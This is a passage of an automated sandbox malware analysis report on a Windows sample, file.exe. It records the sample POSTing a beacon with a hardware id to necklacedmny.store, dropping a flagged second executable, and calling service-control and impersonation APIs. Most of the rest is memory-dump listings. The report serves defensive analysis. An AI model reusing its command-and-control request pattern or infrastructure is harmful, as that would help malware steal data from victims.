                                                                            2024-10-29 13:11:34 UTC15331OUTData Raw: 74 bd da 6f 21 48 fb 84 d1 a4 01 d8 3c 2e c4 dc 50 49 e5 00 79 27 9d 76 6c 83 41 b7 d9 44 73 be da e8 c0 0d a1 60 bb cb 27 b5 45 cd 1d 6a cb 1c 51 67 a4 f1 bd 2d 71 ac db 08 84 de 85 04 d8 95 c6 6e 9e cb 66 57 37 f0 c2 c6 9b 07 1c 42 c3 1b 78 7e e3 5b 07 cf fa 47 34 b8 f3 d3 52 6a 3c eb 96 e7 01 82 3a ac 4e cc 80 49 6b b7 30 83 38 01 57 8d 5d 2b 10 a8 ce 55 34 eb 05 ce 8d 09 be 54 85 a8 21 7e ad 9c c0 21 2d c0 fb c5 59 35 91 ba c6 38 da 00 6f 7c ee 5a 85 67 44 4a 04 ef 57 68 04 76 55 2f 54 30 88 69 73 01 95 17 7f 6a b1 5f 62 60 57 2d c6 90 a8 80 e5 22 3a c7 9b e4 46 0c 7e 4a b3 18 8e 9e af 19 47 fe 16 77 2e ba 4b e5 87 f5 8c 56 65 b6 53 73 be f3 14 20 86 c9 b8 c4 ff 0c 78 34 4b 02 38 c0 68 3d b1 15 ee 29 3a 77 cd 35 20 ea ac 53 99 9c fe a6 77 51 f7 e1 a5
                                                                            Data Ascii: to!H<.PIy'vlADs`'EjQg-qnfW7Bx~[G4Rj<:NIk08W]+U4T!~!-Y58o|ZgDJWhvU/T0isj_b`W-":F~JGw.KVeSs x4K8h=):w5 SwQ
                                                                            2024-10-29 13:11:37 UTC1025INHTTP/1.1 200 OK
                                                                            Date: Tue, 29 Oct 2024 13:11:37 GMT
                                                                            Content-Type: text/html; charset=UTF-8
                                                                            Transfer-Encoding: chunked
                                                                            Connection: close
                                                                            Set-Cookie: PHPSESSID=c27s8fhi5c285vc6h89hq9t6re; expires=Sat, 22 Feb 2025 06:58:15 GMT; Max-Age=9999999; path=/
                                                                            Expires: Thu, 19 Nov 1981 08:52:00 GMT
                                                                            Cache-Control: no-store, no-cache, must-revalidate
                                                                            Pragma: no-cache
                                                                            cf-cache-status: DYNAMIC
                                                                            vary: accept-encoding
                                                                            Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=aGdH%2FJhIO57Gw9DQQMRSLUe7Nlt%2B0fM9HrnqFYuPNz3hJ0RUp9AP0jIzyM2Cy%2BmqVZHNtSGb%2BzZ0sk2BFHlo6EwTxcSHk2VmU0Dc5RKMApuaViUwuFnDRTwmeaJmGqzVSC%2FLzzk%3D"}],"group":"cf-nel","max_age":604800}
                                                                            NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                                            Server: cloudflare
                                                                            CF-RAY: 8da36988ba8b466e-DFW
                                                                            alt-svc: h3=":443"; ma=86400
                                                                            server-timing: cfL4;desc="?proto=TCP&rtt=1815&sent=207&recv=589&lost=0&retrans=0&sent_bytes=2846&recv_bytes=553655&delivery_rate=1572204&cwnd=243&unsent_bytes=0&cid=5690b9b2f5a97f43&ts=3003&x=0"


                                                                            Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                            7192.168.2.749840188.114.97.34437308C:\Users\user\Desktop\file.exe
                                                                            TimestampBytes transferredDirectionData
                                                                            2024-10-29 13:11:38 UTC266OUTPOST /api HTTP/1.1
                                                                            Connection: Keep-Alive
                                                                            Content-Type: application/x-www-form-urlencoded
                                                                            User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36
                                                                            Content-Length: 87
                                                                            Host: necklacedmny.store
                                                                            2024-10-29 13:11:38 UTC87OUTData Raw: 61 63 74 3d 67 65 74 5f 6d 65 73 73 61 67 65 26 76 65 72 3d 34 2e 30 26 6c 69 64 3d 34 53 44 30 79 34 2d 2d 6c 65 67 65 6e 64 61 72 79 79 26 6a 3d 26 68 77 69 64 3d 35 34 39 36 30 39 39 46 38 38 42 45 38 38 32 44 31 41 39 41 42 36 33 34 43 37 37 42 38 36 31 37
                                                                            Data Ascii: act=get_message&ver=4.0&lid=4SD0y4--legendaryy&j=&hwid=5496099F88BE882D1A9AB634C77B8617
                                                                            2024-10-29 13:11:38 UTC1017INHTTP/1.1 200 OK
                                                                            Date: Tue, 29 Oct 2024 13:11:38 GMT
                                                                            Content-Type: text/html; charset=UTF-8
                                                                            Transfer-Encoding: chunked
                                                                            Connection: close
                                                                            Set-Cookie: PHPSESSID=2tlp4fk2tt02s2ri5isusdsj24; expires=Sat, 22 Feb 2025 06:58:17 GMT; Max-Age=9999999; path=/
                                                                            Expires: Thu, 19 Nov 1981 08:52:00 GMT
                                                                            Cache-Control: no-store, no-cache, must-revalidate
                                                                            Pragma: no-cache
                                                                            cf-cache-status: DYNAMIC
                                                                            vary: accept-encoding
                                                                            Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=WL3WCL0wBzfpq7I%2BLKs1sxCwEqaBhs7RXf2Cb%2F2m5LpaCUoEVpbOYON9HyDBhDY867%2Bq1Sm5dyezefouj3eXo8goP6WOHMp9eMs2XaaPGV%2FwC4i%2BKI2vz7uv5m6IxcLJ6PhiBLk%3D"}],"group":"cf-nel","max_age":604800}
                                                                            NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                                            Server: cloudflare
                                                                            CF-RAY: 8da3699f7d5f6b07-DFW
                                                                            alt-svc: h3=":443"; ma=86400
                                                                            server-timing: cfL4;desc="?proto=TCP&rtt=1045&sent=5&recv=7&lost=0&retrans=0&sent_bytes=2844&recv_bytes=989&delivery_rate=2732075&cwnd=251&unsent_bytes=0&cid=fec6a75d84f879f6&ts=526&x=0"
                                                                            2024-10-29 13:11:38 UTC130INData Raw: 37 63 0d 0a 66 64 2f 2f 78 71 6b 66 2b 59 6b 64 4d 45 55 64 44 65 6a 47 42 7a 69 51 36 48 31 4c 2b 55 5a 51 78 43 74 2b 43 73 41 30 74 2b 63 6d 70 4e 32 7a 69 79 58 62 34 57 6c 45 4e 53 64 52 78 35 6f 6f 43 61 6a 64 55 33 6e 49 63 33 37 31 47 6b 30 6b 38 51 4c 72 79 42 4b 35 6d 5a 71 47 65 35 7a 76 4d 31 55 39 65 43 2f 45 35 47 46 4d 73 74 4a 4e 5a 39 73 6a 63 76 34 62 41 31 63 3d 0d 0a
                                                                            Data Ascii: 7cfd//xqkf+YkdMEUdDejGBziQ6H1L+UZQxCt+CsA0t+cmpN2ziyXb4WlENSdRx5ooCajdU3nIc371Gk0k8QLryBK5mZqGe5zvM1U9eC/E5GFMstJNZ9sjcv4bA1c=
                                                                            2024-10-29 13:11:38 UTC5INData Raw: 30 0d 0a 0d 0a
                                                                            Data Ascii: 0


                                                                            Statistics

                                                                            CPU Usage

                                                                            Click to jump to process

                                                                            Memory Usage

                                                                            Click to jump to process

                                                                            High Level Behavior Distribution

                                                                            Click to dive into process behavior distribution

                                                                            Behavior

                                                                            Click to jump to process

                                                                            System Behavior

                                                                            General

                                                                            Target ID:0
                                                                            Start time:09:11:17
                                                                            Start date:29/10/2024
                                                                            Path:C:\Users\user\Desktop\file.exe
                                                                            Wow64 process (32bit):true
                                                                            Commandline:"C:\Users\user\Desktop\file.exe"
                                                                            Imagebase:0xf90000
                                                                            File size:2'994'688 bytes
                                                                            MD5 hash:72495BC5DDC3BD55A1F0C69FE26B528A
                                                                            Has elevated privileges:true
                                                                            Has administrator privileges:true
                                                                            Programmed in:C, C++ or other language
                                                                            Reputation:low
                                                                            Has exited:true

                                                                            General

                                                                            Target ID:3
                                                                            Start time:09:11:42
                                                                            Start date:29/10/2024
                                                                            Path:C:\Users\user\AppData\Local\Temp\7V52BG1QZHX6WU0LEYA.exe
                                                                            Wow64 process (32bit):true
                                                                            Commandline:"C:\Users\user~1\AppData\Local\Temp\7V52BG1QZHX6WU0LEYA.exe"
                                                                            Imagebase:0x810000
                                                                            File size:2'810'880 bytes
                                                                            MD5 hash:7860724D095EE801E47A74168A09B6C4
                                                                            Has elevated privileges:true
                                                                            Has administrator privileges:true
                                                                            Programmed in:C, C++ or other language
                                                                            Antivirus matches:
                                                                            • Detection: 100%, Joe Sandbox ML
                                                                            Reputation:low
                                                                            Has exited:true

                                                                            Disassembly

                                                                            Reset < >

                                                                              Non-executed Functions

                                                                              Function 0156D587 Relevance: 15.3, Strings: 12, Instructions: 278COMMON
                                                                              Download Yara Rule
                                                                              Strings
                                                                              Memory Dump Source
                                                                              • Source File: 00000000.00000003.1496372080.000000000156B000.00000004.00000020.00020000.00000000.sdmp, Offset: 0156B000, based on PE: false
                                                                              Joe Sandbox IDA Plugin
                                                                              • Snapshot File: hcaresult_0_3_1560000_file.jbxd
                                                                              Similarity
                                                                              • API ID:
                                                                              • String ID: .0.0$a$ault$efault$m$mat$ort$ort$ort$pps$~ti$~vi
                                                                              • API String ID: 0-1640093782
                                                                              • Opcode ID: 9f3e0aaf75d7f56a4ddbca330bc855e6ef00a1f5eea7996483855cd595666917
                                                                              • Instruction ID: 05afb9b10859b83d921af04ac3a4490a7adabdf5416800af9c321fe451f3d179
                                                                              • Opcode Fuzzy Hash: 9f3e0aaf75d7f56a4ddbca330bc855e6ef00a1f5eea7996483855cd595666917
                                                                              • Instruction Fuzzy Hash: 7FB10C6250E7C18ED3278BB89E666547FB9BF63604B0E19C7C0C4CF1B3D2695A09C762

                                                                              Execution Graph

                                                                              Execution Coverage:3%
                                                                              Dynamic/Decrypted Code Coverage:36%
                                                                              Signature Coverage:8%
                                                                              Total number of Nodes:25
                                                                              Total number of Limit Nodes:1
                                                                              execution_graph 6589 9aa228 6590 9aa748 6589->6590 6591 9aa7ac RegOpenKeyA 6590->6591 6592 9aa785 RegOpenKeyA 6590->6592 6594 9aa7c9 6591->6594 6592->6591 6593 9aa7a2 6592->6593 6593->6591 6595 9aa80d GetNativeSystemInfo 6594->6595 6596 9aa818 6594->6596 6595->6596 6581 4b31510 6582 4b31558 ControlService 6581->6582 6583 4b3158f 6582->6583 6599 81e839 6600 81ed73 VirtualAlloc 6599->6600 6601 81edc8 6600->6601 6586 9a8ed0 LoadLibraryA 6602 9bd180 CloseHandle 6603 9bd189 6602->6603 6604 4b30d48 6605 4b30d93 OpenSCManagerW 6604->6605 6607 4b30ddc 6605->6607 6608 4b31308 6609 4b31349 ImpersonateLoggedOnUser 6608->6609 6610 4b31376 6609->6610 6587 9987f5 LoadLibraryA 6588 998811 6587->6588

                                                                              Executed Functions

                                                                              Function 009BD180 Relevance: 3.1, APIs: 1, Strings: 1, Instructions: 135COMMON
                                                                              Download Yara Rule

                                                                              Control-flow Graph

                                                                              • Executed
                                                                              • Not Executed
                                                                              control_flow_graph 26 9bd180-9bd183 CloseHandle 27 9bd189-9bd190 26->27 28 9bd191-9bd307 26->28 27->28
                                                                              APIs
                                                                              Strings
                                                                              Memory Dump Source
                                                                              • Source File: 00000003.00000002.1752363877.00000000009BD000.00000040.00000001.01000000.00000006.sdmp, Offset: 00810000, based on PE: true
                                                                              • Associated: 00000003.00000002.1751953575.0000000000810000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                              • Associated: 00000003.00000002.1751970734.0000000000812000.00000040.00000001.01000000.00000006.sdmpDownload File
                                                                              • Associated: 00000003.00000002.1751990207.0000000000816000.00000008.00000001.01000000.00000006.sdmpDownload File
                                                                              • Associated: 00000003.00000002.1752007639.000000000081A000.00000040.00000001.01000000.00000006.sdmpDownload File
                                                                              • Associated: 00000003.00000002.1752025977.0000000000826000.00000080.00000001.01000000.00000006.sdmpDownload File
                                                                              • Associated: 00000003.00000002.1752120456.000000000097E000.00000040.00000001.01000000.00000006.sdmpDownload File
                                                                              • Associated: 00000003.00000002.1752140104.0000000000980000.00000080.00000001.01000000.00000006.sdmpDownload File
                                                                              • Associated: 00000003.00000002.1752161410.0000000000995000.00000040.00000001.01000000.00000006.sdmpDownload File
                                                                              • Associated: 00000003.00000002.1752179247.0000000000997000.00000080.00000001.01000000.00000006.sdmpDownload File
                                                                              • Associated: 00000003.00000002.1752196760.0000000000999000.00000040.00000001.01000000.00000006.sdmpDownload File
                                                                              • Associated: 00000003.00000002.1752196760.00000000009A2000.00000040.00000001.01000000.00000006.sdmpDownload File
                                                                              • Associated: 00000003.00000002.1752232854.00000000009A6000.00000080.00000001.01000000.00000006.sdmpDownload File
                                                                              • Associated: 00000003.00000002.1752249808.00000000009A7000.00000040.00000001.01000000.00000006.sdmpDownload File
                                                                              • Associated: 00000003.00000002.1752267225.00000000009A8000.00000080.00000001.01000000.00000006.sdmpDownload File
                                                                              • Associated: 00000003.00000002.1752285406.00000000009A9000.00000040.00000001.01000000.00000006.sdmpDownload File
                                                                              • Associated: 00000003.00000002.1752303133.00000000009AA000.00000080.00000001.01000000.00000006.sdmpDownload File
                                                                              • Associated: 00000003.00000002.1752321697.00000000009AB000.00000040.00000001.01000000.00000006.sdmpDownload File
                                                                              • Associated: 00000003.00000002.1752344113.00000000009BC000.00000080.00000001.01000000.00000006.sdmpDownload File
                                                                              • Associated: 00000003.00000002.1752388616.00000000009BE000.00000080.00000001.01000000.00000006.sdmpDownload File
                                                                              • Associated: 00000003.00000002.1752405842.00000000009BF000.00000040.00000001.01000000.00000006.sdmpDownload File
                                                                              • Associated: 00000003.00000002.1752427279.00000000009D2000.00000080.00000001.01000000.00000006.sdmpDownload File
                                                                              • Associated: 00000003.00000002.1752448579.00000000009E3000.00000040.00000001.01000000.00000006.sdmpDownload File
                                                                              • Associated: 00000003.00000002.1752467232.00000000009F0000.00000080.00000001.01000000.00000006.sdmpDownload File
                                                                              • Associated: 00000003.00000002.1752485264.00000000009F5000.00000040.00000001.01000000.00000006.sdmpDownload File
                                                                              • Associated: 00000003.00000002.1752502108.00000000009F6000.00000080.00000001.01000000.00000006.sdmpDownload File
                                                                              • Associated: 00000003.00000002.1752518317.00000000009F8000.00000040.00000001.01000000.00000006.sdmpDownload File
                                                                              • Associated: 00000003.00000002.1752534438.00000000009FA000.00000080.00000001.01000000.00000006.sdmpDownload File
                                                                              • Associated: 00000003.00000002.1752553028.00000000009FC000.00000040.00000001.01000000.00000006.sdmpDownload File
                                                                              • Associated: 00000003.00000002.1752572028.0000000000A07000.00000080.00000001.01000000.00000006.sdmpDownload File
                                                                              • Associated: 00000003.00000002.1752590096.0000000000A0B000.00000040.00000001.01000000.00000006.sdmpDownload File
                                                                              • Associated: 00000003.00000002.1752606576.0000000000A12000.00000080.00000001.01000000.00000006.sdmpDownload File
                                                                              • Associated: 00000003.00000002.1752622464.0000000000A14000.00000040.00000001.01000000.00000006.sdmpDownload File
                                                                              • Associated: 00000003.00000002.1752639402.0000000000A1B000.00000080.00000001.01000000.00000006.sdmpDownload File
                                                                              • Associated: 00000003.00000002.1752655586.0000000000A20000.00000040.00000001.01000000.00000006.sdmpDownload File
                                                                              • Associated: 00000003.00000002.1752673590.0000000000A21000.00000080.00000001.01000000.00000006.sdmpDownload File
                                                                              • Associated: 00000003.00000002.1752689408.0000000000A23000.00000040.00000001.01000000.00000006.sdmpDownload File
                                                                              • Associated: 00000003.00000002.1752705400.0000000000A2C000.00000080.00000001.01000000.00000006.sdmpDownload File
                                                                              • Associated: 00000003.00000002.1752723263.0000000000A31000.00000040.00000001.01000000.00000006.sdmpDownload File
                                                                              • Associated: 00000003.00000002.1752741386.0000000000A39000.00000080.00000001.01000000.00000006.sdmpDownload File
                                                                              • Associated: 00000003.00000002.1752758703.0000000000A3A000.00000040.00000001.01000000.00000006.sdmpDownload File
                                                                              • Associated: 00000003.00000002.1752777279.0000000000A42000.00000080.00000001.01000000.00000006.sdmpDownload File
                                                                              • Associated: 00000003.00000002.1752797046.0000000000A44000.00000040.00000001.01000000.00000006.sdmpDownload File
                                                                              • Associated: 00000003.00000002.1752815495.0000000000A4C000.00000080.00000001.01000000.00000006.sdmpDownload File
                                                                              • Associated: 00000003.00000002.1752833047.0000000000A4F000.00000040.00000001.01000000.00000006.sdmpDownload File
                                                                              • Associated: 00000003.00000002.1752852198.0000000000A5E000.00000080.00000001.01000000.00000006.sdmpDownload File
                                                                              • Associated: 00000003.00000002.1752875919.0000000000A60000.00000040.00000001.01000000.00000006.sdmpDownload File
                                                                              • Associated: 00000003.00000002.1752894349.0000000000A6C000.00000080.00000001.01000000.00000006.sdmpDownload File
                                                                              • Associated: 00000003.00000002.1752912346.0000000000A6D000.00000040.00000001.01000000.00000006.sdmpDownload File
                                                                              • Associated: 00000003.00000002.1752930924.0000000000A6E000.00000080.00000001.01000000.00000006.sdmpDownload File
                                                                              • Associated: 00000003.00000002.1752950281.0000000000A71000.00000040.00000001.01000000.00000006.sdmpDownload File
                                                                              • Associated: 00000003.00000002.1752979736.0000000000AAD000.00000080.00000001.01000000.00000006.sdmpDownload File
                                                                              • Associated: 00000003.00000002.1752979736.0000000000AB3000.00000080.00000001.01000000.00000006.sdmpDownload File
                                                                              • Associated: 00000003.00000002.1753018423.0000000000AC4000.00000040.00000001.01000000.00000006.sdmpDownload File
                                                                              • Associated: 00000003.00000002.1753034854.0000000000AC6000.00000080.00000001.01000000.00000006.sdmpDownload File
                                                                              Joe Sandbox IDA Plugin
                                                                              • Snapshot File: hcaresult_3_2_810000_7V52BG1QZHX6WU0LEYA.jbxd
                                                                              Similarity
                                                                              • API ID: CloseHandle
                                                                              • String ID: %`w_
                                                                              • API String ID: 2962429428-1708517476
                                                                              • Opcode ID: cb2860dede46c2c222f03b57166b2112500ae24286496e6f951e99c1da20eb45
                                                                              • Instruction ID: 4f4b058ed32a736363c62cf4fcf972651ffc265ec207f4750be468b173bca83f
                                                                              • Opcode Fuzzy Hash: cb2860dede46c2c222f03b57166b2112500ae24286496e6f951e99c1da20eb45
                                                                              • Instruction Fuzzy Hash: 6B4139B260C300AFE304AF19D941ABEFBE9EFC4720F26882DE5C4C2610D63548859B67
                                                                              Function 0081B974 Relevance: .0, Instructions: 32COMMON
                                                                              Download Yara Rule
                                                                              Memory Dump Source
                                                                              • Source File: 00000003.00000002.1752007639.000000000081A000.00000040.00000001.01000000.00000006.sdmp, Offset: 00810000, based on PE: true
                                                                              • Associated: 00000003.00000002.1751953575.0000000000810000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                              • Associated: 00000003.00000002.1751970734.0000000000812000.00000040.00000001.01000000.00000006.sdmpDownload File
                                                                              • Associated: 00000003.00000002.1751990207.0000000000816000.00000008.00000001.01000000.00000006.sdmpDownload File
                                                                              • Associated: 00000003.00000002.1752025977.0000000000826000.00000080.00000001.01000000.00000006.sdmpDownload File
                                                                              • Associated: 00000003.00000002.1752120456.000000000097E000.00000040.00000001.01000000.00000006.sdmpDownload File
                                                                              • Associated: 00000003.00000002.1752140104.0000000000980000.00000080.00000001.01000000.00000006.sdmpDownload File
                                                                              • Associated: 00000003.00000002.1752161410.0000000000995000.00000040.00000001.01000000.00000006.sdmpDownload File
                                                                              • Associated: 00000003.00000002.1752179247.0000000000997000.00000080.00000001.01000000.00000006.sdmpDownload File
                                                                              • Associated: 00000003.00000002.1752196760.0000000000999000.00000040.00000001.01000000.00000006.sdmpDownload File
                                                                              • Associated: 00000003.00000002.1752196760.00000000009A2000.00000040.00000001.01000000.00000006.sdmpDownload File
                                                                              • Associated: 00000003.00000002.1752232854.00000000009A6000.00000080.00000001.01000000.00000006.sdmpDownload File
                                                                              • Associated: 00000003.00000002.1752249808.00000000009A7000.00000040.00000001.01000000.00000006.sdmpDownload File
                                                                              • Associated: 00000003.00000002.1752267225.00000000009A8000.00000080.00000001.01000000.00000006.sdmpDownload File
                                                                              • Associated: 00000003.00000002.1752285406.00000000009A9000.00000040.00000001.01000000.00000006.sdmpDownload File
                                                                              • Associated: 00000003.00000002.1752303133.00000000009AA000.00000080.00000001.01000000.00000006.sdmpDownload File
                                                                              • Associated: 00000003.00000002.1752321697.00000000009AB000.00000040.00000001.01000000.00000006.sdmpDownload File
                                                                              • Associated: 00000003.00000002.1752344113.00000000009BC000.00000080.00000001.01000000.00000006.sdmpDownload File
                                                                              • Associated: 00000003.00000002.1752363877.00000000009BD000.00000040.00000001.01000000.00000006.sdmpDownload File
                                                                              • Associated: 00000003.00000002.1752388616.00000000009BE000.00000080.00000001.01000000.00000006.sdmpDownload File
                                                                              • Associated: 00000003.00000002.1752405842.00000000009BF000.00000040.00000001.01000000.00000006.sdmpDownload File
                                                                              • Associated: 00000003.00000002.1752427279.00000000009D2000.00000080.00000001.01000000.00000006.sdmpDownload File
                                                                              • Associated: 00000003.00000002.1752448579.00000000009E3000.00000040.00000001.01000000.00000006.sdmpDownload File
                                                                              • Associated: 00000003.00000002.1752467232.00000000009F0000.00000080.00000001.01000000.00000006.sdmpDownload File
                                                                              • Associated: 00000003.00000002.1752485264.00000000009F5000.00000040.00000001.01000000.00000006.sdmpDownload File
                                                                              • Associated: 00000003.00000002.1752502108.00000000009F6000.00000080.00000001.01000000.00000006.sdmpDownload File
                                                                              • Associated: 00000003.00000002.1752518317.00000000009F8000.00000040.00000001.01000000.00000006.sdmpDownload File
                                                                              • Associated: 00000003.00000002.1752534438.00000000009FA000.00000080.00000001.01000000.00000006.sdmpDownload File
                                                                              • Associated: 00000003.00000002.1752553028.00000000009FC000.00000040.00000001.01000000.00000006.sdmpDownload File
                                                                              • Associated: 00000003.00000002.1752572028.0000000000A07000.00000080.00000001.01000000.00000006.sdmpDownload File
                                                                              • Associated: 00000003.00000002.1752590096.0000000000A0B000.00000040.00000001.01000000.00000006.sdmpDownload File
                                                                              • Associated: 00000003.00000002.1752606576.0000000000A12000.00000080.00000001.01000000.00000006.sdmpDownload File
                                                                              • Associated: 00000003.00000002.1752622464.0000000000A14000.00000040.00000001.01000000.00000006.sdmpDownload File
                                                                              • Associated: 00000003.00000002.1752639402.0000000000A1B000.00000080.00000001.01000000.00000006.sdmpDownload File
                                                                              • Associated: 00000003.00000002.1752655586.0000000000A20000.00000040.00000001.01000000.00000006.sdmpDownload File
                                                                              • Associated: 00000003.00000002.1752673590.0000000000A21000.00000080.00000001.01000000.00000006.sdmpDownload File
                                                                              • Associated: 00000003.00000002.1752689408.0000000000A23000.00000040.00000001.01000000.00000006.sdmpDownload File
                                                                              • Associated: 00000003.00000002.1752705400.0000000000A2C000.00000080.00000001.01000000.00000006.sdmpDownload File
                                                                              • Associated: 00000003.00000002.1752723263.0000000000A31000.00000040.00000001.01000000.00000006.sdmpDownload File
                                                                              • Associated: 00000003.00000002.1752741386.0000000000A39000.00000080.00000001.01000000.00000006.sdmpDownload File
                                                                              • Associated: 00000003.00000002.1752758703.0000000000A3A000.00000040.00000001.01000000.00000006.sdmpDownload File
                                                                              • Associated: 00000003.00000002.1752777279.0000000000A42000.00000080.00000001.01000000.00000006.sdmpDownload File
                                                                              • Associated: 00000003.00000002.1752797046.0000000000A44000.00000040.00000001.01000000.00000006.sdmpDownload File
                                                                              • Associated: 00000003.00000002.1752815495.0000000000A4C000.00000080.00000001.01000000.00000006.sdmpDownload File
                                                                              • Associated: 00000003.00000002.1752833047.0000000000A4F000.00000040.00000001.01000000.00000006.sdmpDownload File
                                                                              • Associated: 00000003.00000002.1752852198.0000000000A5E000.00000080.00000001.01000000.00000006.sdmpDownload File
                                                                              • Associated: 00000003.00000002.1752875919.0000000000A60000.00000040.00000001.01000000.00000006.sdmpDownload File
                                                                              • Associated: 00000003.00000002.1752894349.0000000000A6C000.00000080.00000001.01000000.00000006.sdmpDownload File
                                                                              • Associated: 00000003.00000002.1752912346.0000000000A6D000.00000040.00000001.01000000.00000006.sdmpDownload File
                                                                              • Associated: 00000003.00000002.1752930924.0000000000A6E000.00000080.00000001.01000000.00000006.sdmpDownload File
                                                                              • Associated: 00000003.00000002.1752950281.0000000000A71000.00000040.00000001.01000000.00000006.sdmpDownload File
                                                                              • Associated: 00000003.00000002.1752979736.0000000000AAD000.00000080.00000001.01000000.00000006.sdmpDownload File
                                                                              • Associated: 00000003.00000002.1752979736.0000000000AB3000.00000080.00000001.01000000.00000006.sdmpDownload File
                                                                              • Associated: 00000003.00000002.1753018423.0000000000AC4000.00000040.00000001.01000000.00000006.sdmpDownload File
                                                                              • Associated: 00000003.00000002.1753034854.0000000000AC6000.00000080.00000001.01000000.00000006.sdmpDownload File
                                                                              Joe Sandbox IDA Plugin
                                                                              • Snapshot File: hcaresult_3_2_810000_7V52BG1QZHX6WU0LEYA.jbxd
                                                                              Similarity
                                                                              • API ID:
                                                                              • String ID:
                                                                              • API String ID:
                                                                              • Opcode ID: db21ccde6a45aca998f65f6321a8eefe963ce2b76c9ba802669b3c2597185a22
                                                                              • Instruction ID: e5d415e0c88a67945d17126e20fb102d942aecfc76dab486f912da288c150ff6
                                                                              • Opcode Fuzzy Hash: db21ccde6a45aca998f65f6321a8eefe963ce2b76c9ba802669b3c2597185a22
                                                                              • Instruction Fuzzy Hash: A4F09762010901C6C3026F3E462ABE03F29FF80B2DF2482A69341CA2A6F32948C39300
                                                                              Function 009AA228 Relevance: 4.6, APIs: 3, Instructions: 70registryCOMMON
                                                                              Download Yara Rule

                                                                              Control-flow Graph

                                                                              • Executed
                                                                              • Not Executed
                                                                              control_flow_graph 0 9aa228-9aa783 3 9aa7ac-9aa7c7 RegOpenKeyA 0->3 4 9aa785-9aa7a0 RegOpenKeyA 0->4 6 9aa7c9-9aa7d3 3->6 7 9aa7df-9aa80b 3->7 4->3 5 9aa7a2 4->5 5->3 6->7 10 9aa818-9aa822 7->10 11 9aa80d-9aa816 GetNativeSystemInfo 7->11 12 9aa82e-9aa83c 10->12 13 9aa824 10->13 11->10 15 9aa848-9aa84f 12->15 16 9aa83e 12->16 13->12 17 9aa862 15->17 18 9aa855-9aa85c 15->18 16->15 17->17 18->17
                                                                              APIs
                                                                              • RegOpenKeyA.ADVAPI32(80000001,?,?), ref: 009AA798
                                                                              • RegOpenKeyA.ADVAPI32(80000002,?,?), ref: 009AA7BF
                                                                              • GetNativeSystemInfo.KERNELBASE(?), ref: 009AA816
                                                                              Memory Dump Source
                                                                              • Source File: 00000003.00000002.1752303133.00000000009AA000.00000080.00000001.01000000.00000006.sdmp, Offset: 00810000, based on PE: true
                                                                              • Associated: 00000003.00000002.1751953575.0000000000810000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                              • Associated: 00000003.00000002.1751970734.0000000000812000.00000040.00000001.01000000.00000006.sdmpDownload File
                                                                              • Associated: 00000003.00000002.1751990207.0000000000816000.00000008.00000001.01000000.00000006.sdmpDownload File
                                                                              • Associated: 00000003.00000002.1752007639.000000000081A000.00000040.00000001.01000000.00000006.sdmpDownload File
                                                                              • Associated: 00000003.00000002.1752025977.0000000000826000.00000080.00000001.01000000.00000006.sdmpDownload File
                                                                              • Associated: 00000003.00000002.1752120456.000000000097E000.00000040.00000001.01000000.00000006.sdmpDownload File
                                                                              • Associated: 00000003.00000002.1752140104.0000000000980000.00000080.00000001.01000000.00000006.sdmpDownload File
                                                                              • Associated: 00000003.00000002.1752161410.0000000000995000.00000040.00000001.01000000.00000006.sdmpDownload File
                                                                              • Associated: 00000003.00000002.1752179247.0000000000997000.00000080.00000001.01000000.00000006.sdmpDownload File
                                                                              • Associated: 00000003.00000002.1752196760.0000000000999000.00000040.00000001.01000000.00000006.sdmpDownload File
                                                                              • Associated: 00000003.00000002.1752196760.00000000009A2000.00000040.00000001.01000000.00000006.sdmpDownload File
                                                                              • Associated: 00000003.00000002.1752232854.00000000009A6000.00000080.00000001.01000000.00000006.sdmpDownload File
                                                                              • Associated: 00000003.00000002.1752249808.00000000009A7000.00000040.00000001.01000000.00000006.sdmpDownload File
                                                                              • Associated: 00000003.00000002.1752267225.00000000009A8000.00000080.00000001.01000000.00000006.sdmpDownload File
                                                                              • Associated: 00000003.00000002.1752285406.00000000009A9000.00000040.00000001.01000000.00000006.sdmpDownload File
                                                                              • Associated: 00000003.00000002.1752321697.00000000009AB000.00000040.00000001.01000000.00000006.sdmpDownload File
                                                                              • Associated: 00000003.00000002.1752344113.00000000009BC000.00000080.00000001.01000000.00000006.sdmpDownload File
                                                                              • Associated: 00000003.00000002.1752363877.00000000009BD000.00000040.00000001.01000000.00000006.sdmpDownload File
                                                                              • Associated: 00000003.00000002.1752388616.00000000009BE000.00000080.00000001.01000000.00000006.sdmpDownload File
                                                                              • Associated: 00000003.00000002.1752405842.00000000009BF000.00000040.00000001.01000000.00000006.sdmpDownload File
                                                                              • Associated: 00000003.00000002.1752427279.00000000009D2000.00000080.00000001.01000000.00000006.sdmpDownload File
                                                                              • Associated: 00000003.00000002.1752448579.00000000009E3000.00000040.00000001.01000000.00000006.sdmpDownload File
                                                                              • Associated: 00000003.00000002.1752467232.00000000009F0000.00000080.00000001.01000000.00000006.sdmpDownload File
                                                                              • Associated: 00000003.00000002.1752485264.00000000009F5000.00000040.00000001.01000000.00000006.sdmpDownload File
                                                                              • Associated: 00000003.00000002.1752502108.00000000009F6000.00000080.00000001.01000000.00000006.sdmpDownload File
                                                                              • Associated: 00000003.00000002.1752518317.00000000009F8000.00000040.00000001.01000000.00000006.sdmpDownload File
                                                                              • Associated: 00000003.00000002.1752534438.00000000009FA000.00000080.00000001.01000000.00000006.sdmpDownload File
                                                                              • Associated: 00000003.00000002.1752553028.00000000009FC000.00000040.00000001.01000000.00000006.sdmpDownload File
                                                                              • Associated: 00000003.00000002.1752572028.0000000000A07000.00000080.00000001.01000000.00000006.sdmpDownload File
                                                                              • Associated: 00000003.00000002.1752590096.0000000000A0B000.00000040.00000001.01000000.00000006.sdmpDownload File
                                                                              • Associated: 00000003.00000002.1752606576.0000000000A12000.00000080.00000001.01000000.00000006.sdmpDownload File
                                                                              • Associated: 00000003.00000002.1752622464.0000000000A14000.00000040.00000001.01000000.00000006.sdmpDownload File
